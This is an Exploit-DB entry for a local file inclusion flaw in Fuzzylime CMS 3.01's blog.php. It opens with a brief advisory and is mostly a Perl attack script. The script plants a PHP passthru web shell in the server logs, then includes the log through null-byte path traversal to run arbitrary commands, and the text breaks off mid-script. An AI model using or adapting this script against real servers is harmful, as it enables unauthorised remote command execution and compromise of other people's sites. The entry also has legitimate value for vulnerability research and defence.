Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion

EDB-ID:

32016


Author:

Cod3rZ

Type:

webapps


Platform:

PHP

Date:

2008-07-07


source: https://www.securityfocus.com/bid/30121/info

'fuzzylime (cms)' is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary local script code. This can allow the attacker to obtain sensitive information that may aid in further attacks.

This issue affects fuzzylime (cms) 3.01a; other versions may also be affected. 

#!/usr/bin/perl
# Fuzzylime CMS 3.01 LFI / RCE
# author  : Cod3rZ
# website : http://cod3rz.helloweb.eu
#
# http://[site]/blog.php?file=../[file]\0
# LFI TO RCE
use LWP::UserAgent;
 system("cls");
#system("clear");
 print " -------------------------------------------------\n";
 print " Fuzzylime CMS 3.01 LFI / RCE                     \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";
 print " Insert Site (http://site.com/):                  \n ";
 chomp($site = <STDIN>);
 print " -------------------------------------------------\n";
 print " Insert Logs path                                 \n ";
 chomp($path = <STDIN>);
 print " -------------------------------------------------\n";
 
 #Infect Logs
 $lwp = LWP::UserAgent->new;
 $siten = $site.'/blog.php?file=';
 $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz');
 #Control
 $ua = $lwp->get($site.$path.'%00');
 if($ua->content =~ m/cod3rz/) {
 print " Ok ".$site." is infected                         \n";
 print " -------------------------------------------------\n";
 print " ".$siten.$path."&cmd=[command]\\0                 \n";
 print " --